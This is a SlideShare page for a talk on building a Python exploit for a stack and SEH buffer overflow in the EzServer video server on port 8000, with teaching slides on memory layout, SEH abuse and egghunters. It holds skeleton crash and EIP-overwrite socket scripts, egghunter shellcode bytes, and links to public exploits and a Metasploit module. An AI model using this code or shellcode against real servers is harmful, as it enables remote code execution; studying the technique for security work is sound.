Exploit Development: EzServer Buffer Overflow oleh Tom Gregory


Published on

EzServer adalah video server yang dapat melakukan stream dengan kualitas full HD ke berbagai mesin. Buffer overflow ditemukan pada aplikasi EzServer yang berjalan pada port 8000. Attacker dapat mengirimkan sejumlah kode berbahaya ke port 8000 dan mendapatkan akses setara dengan hak akses aplikasi EzServer. Pada kesempatan ini, penulis akan memaparkan proses pembuatan exploit terhadap aplikasi EzServer menggunakan Python.

Tom Gregory: Security consultant at Spentera, Metasploit exploit developer/contributor.


Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Stack is used for function callsThere are 2 Registers on the CPU associated with stack, EBP and ESP.ESP points to the top of the stack, whereas EBP points to the beginning of the current frameWhen a function is called, arguments, EIP and EBP pushed onto stackEBP is set to ESP, and ESP is decremented to make space for the functions local variable
  • Exploit Development: EzServer Buffer Overflow oleh Tom Gregory

    1. 1. EXPLOITDEVELOPMENTWITH PYTHONTom Gregoryid:python Gathering27 April 2013
    2. 2. AGENDA Memory Stack/Buffer Overflow Structured Exception Handler (SEH) Escape from small space Egghunter Demo
    3. 3. Args./EnvironmentStackUnused MemoryHeap (dynamic data)Static Data .dataProgram Code .textPROCESS MEMORY LAYOUTHigh addressesTop of memory0xFFFFFFFFLow addresses0x00000000Stack grows down byprocedures callHeap grows up e.g. bymalloc and new
    4. 4. STACK BUFFER OVERFLOW#include <string.h>void foo (char *bar){char c[12];strcpy(c, bar); // no bounds checking...}int main (int argc, char **argv){foo(argv[1]);}
    5. 5. STACK BUFFER OVERFLOWUnallocated stackchar c[12]char *barSaved framepointer(EBP)Return Address(EIP)Parent routine‟sstackMemory addressStack growth
    6. 6. STACK BUFFER OVERFLOWUnallocated stackchar c[12]char *barSaved framepointer(EBP)Return Address(EIP)Parent routine‟sstackMemory addressStack growthh e l l0o
    7. 7. STACK BUFFER OVERFLOWUnallocated stackMemory addressStack growthA A A AA A A AA A A AA A A AA A A AA A A AA A A Ax08 x35 xc0 x80Fill the stack with „A‟Overwritten return addressat 0x80c03508Parent routine‟sstackLittleEndian0x80c03508
    8. 8. WHAT IS SEH?This structure ( also called a SEH record) is 8 bytes and has 2 (4bytes each) elements : a pointer to the next exception_registration structure (inessence, to the next SEH record, in case the current handler isunable the handle the exception) a pointer, the address of the actual code of the exception handler.(SE Handler)
    9. 9. WHAT IS SEH?Image was taken without permission from http://images.google.com
    10. 10. LOOK AT THE SEH STRUCTUREBeginning of SEH chain SEH chain will be placed at the top of the main data block It also called FS:[0] chain as well (on intel: mov [reg], dword ptrfs:[0])End of seh chain Is indicated by 0xFFFFFFFF Will trigger improper termination to the program
    11. 11. HOW SEH WORKS?StackTEBFS[0]: 0012FF40 0012FF400012FF440012FFB0 : next SEH record7C839AD8 : SE Handler0012FFB00012FFB40012FFE0 : next SEH record0040109A : SE Handler0012FFE00012FFE4FFFFFFFF : next SEH record7C839AD8 : SE Handler
    12. 12. PROTECTIONS AGAINST SEHXOR before the exception handler is called, all registers are XORedwith each other, so it will make them all point to 0x00000000DEP & Stack Cookies Stack Cookies or Canary is setup via C++ compiler options DEP will mark the memory stack to no execute. It was introduced since Windows XP SP2 and Windows 2003,enabled by default on Windows Vista and 7 Those two protections can make it harder to build exploits.
    13. 13. PROTECTIONS AGAINST SEHSafeSEH additional protection was added to compilers, helping to stop theabuse of SEH overwrites. It will check the original value of SEH, if it overwritten, SafeSEHwill try to bring it back to the original value.
    14. 14. ABUSING SEHOn direct RET technique: Simply find an instruction to jump to the stack, done.While on SEH Based: You cannot simply jump to the stack, because the registers areXORed. We can take advantage this exception handling condition byoverwrite the SE Handler address. The OS will know the exception handling routine, and pass it to nextSEH record. Pointer to next SEH will bring us to the shellcode. Game over!
    15. 15. ABUSING SEHIn other words, the payload must do the following things: Cause an exception. Without an exception, the SEH handler (theone you have overwritten/control) won‟t kick in. Overwrite the pointer to the next SEH record with some jumpcode(so it can jump to the shellcode) Overwrite the SE handler with a pointer to an instruction that willbring you back to next SEH and execute the jumpcode. The shellcode should be directly after the overwritten SE Handler.Some small jumpcode contained in the overwritten “pointer tonext SEH record” will jump to it).
    16. 16. ABUSING SEH When the exception occurred, the position on the stack will going likethis: Possible value to overwrite SE Handler are POP something, POPsomething and RETN to the stack. It will POP address that sit at the top of the stack, POP it again to takethe second address, and RETN to execute the third address (which isnow at the top of the stack)Top of stackOur pointer to next SEHaddress
    17. 17. ABUSING SEHImage was taken from http://corelan.bewith permission from Peter van Eeckhoutte (Corelan)
    18. 18. ESCAPE FROM SMALL SPACE Use Egghunter “Staged shellcode” Use small amount of custom shellcode to find the actual “bigger”shellcode (the egg), by searching entire memory for the finalshellcode
    19. 19. EGGHUNTER There are 3 conditions that are important in order for thistechnique to work We must be able to jump to (jmp, call, push/ret) & execute “some” shellcode,the egghunter. The final shellcode must be available somewhere in memory (stack/heap/…). You must “tag” or prepend the final shellcode with a unique string/marker/tag.This means that we will have to define the marker in the egg hunter code, andalso write it just in front of the actual shellcode.
    20. 20. ENOUGH TALKING!
    21. 21. 1ST SKELETON EXPLOIT: CRASH IT!#!/usr/bin/pythonfrom socket import *junk = "x41" * 10000s = socket(AF_INET, SOCK_STREAM)s.connect((„x.x.x.x‟,8000))print "[+] Launching attack..”s.send ("GET /" + payload + "HTTP/1.0rnrnrn")s.close()
    22. 22. 2ND SKELETON EXPLOIT: EIPOVERWRITE#!/usr/bin/pythonfrom socket import *junk = [random data generated from msf]s = socket(AF_INET, SOCK_STREAM)s.connect((„x.x.x.x‟,8000))print "[+] Launching attack..”s.send ("GET /" + payload + "HTTP/1.0rnrnrn")s.close()
    23. 23. 3RD SKELETON EXPLOIT: SMALLSPACE Egghunterx66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7
    24. 24. 4TH FINAL EXPLOIT Exploit DB http://www.exploit-db.com/exploits/19266/ Metasploit http://www.exploit-db.com/exploits/19291/ http://www.metasploit.com/modules/exploit/windows/http/ezserver_http
    25. 25. EOFtom@spentera.com